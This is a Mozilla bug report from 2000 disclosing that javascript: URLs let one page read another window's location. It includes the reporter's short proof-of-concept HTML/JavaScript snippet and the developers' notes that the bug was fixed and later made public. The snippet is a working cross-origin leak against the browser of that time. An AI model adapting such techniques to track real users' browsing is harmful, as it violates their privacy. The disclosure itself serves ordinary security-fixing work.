Closed
Bug 38178
Opened 26 years ago
Closed 26 years ago
javascript: URLs allow tracking user's browsing
Categories
(Core :: Security, defect, P3)
Core
Security
Tracking
()
VERIFIED
FIXED
M17
People
(Reporter: security-bugs, Assigned: security-bugs)
Details
Attachments
(1 file)
|
249 bytes,
text/html
|
Details |
Subject:
BUG: javascript: URLs allow tracking user's browsing
Date:
Wed, 03 May 2000 17:29:33 +0300
From:
Georgi Guninski <joro@nat.bg>
To:
Norris Boyd <norris@netscape.com>
There is a bug in javascript: urls and/or window.location which allow
tracking user's browsing.
The code is:
-------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
</SCRIPT>
<A
HREF="javascript:a.location='javascript:opener.loc=
window.location;void(0)';setTimeout('alert(window.loc);',1000);void(0);">Click
here to see the location of the other window</A>
</HTML>
-------------------------------------------
| Assignee | ||
Comment 1•26 years ago
|
||
| Assignee | ||
Comment 2•26 years ago
|
||
Problems with the trust boundary for javscript: URLs. Marking M17.
Status: NEW → ASSIGNED
Target Milestone: --- → M17
| Assignee | ||
Comment 4•26 years ago
|
||
Fixed with JS URL patch. Marking Fixed, but let's watch this one for
regressions. As with many of these bugs, fixing bug 28443, the safe default for
DOM properties, will provide an extra measure of confidence about this bug.
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
| Assignee | ||
Comment 6•25 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Updated•20 years ago
|
Flags: testcase+
Updated•19 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•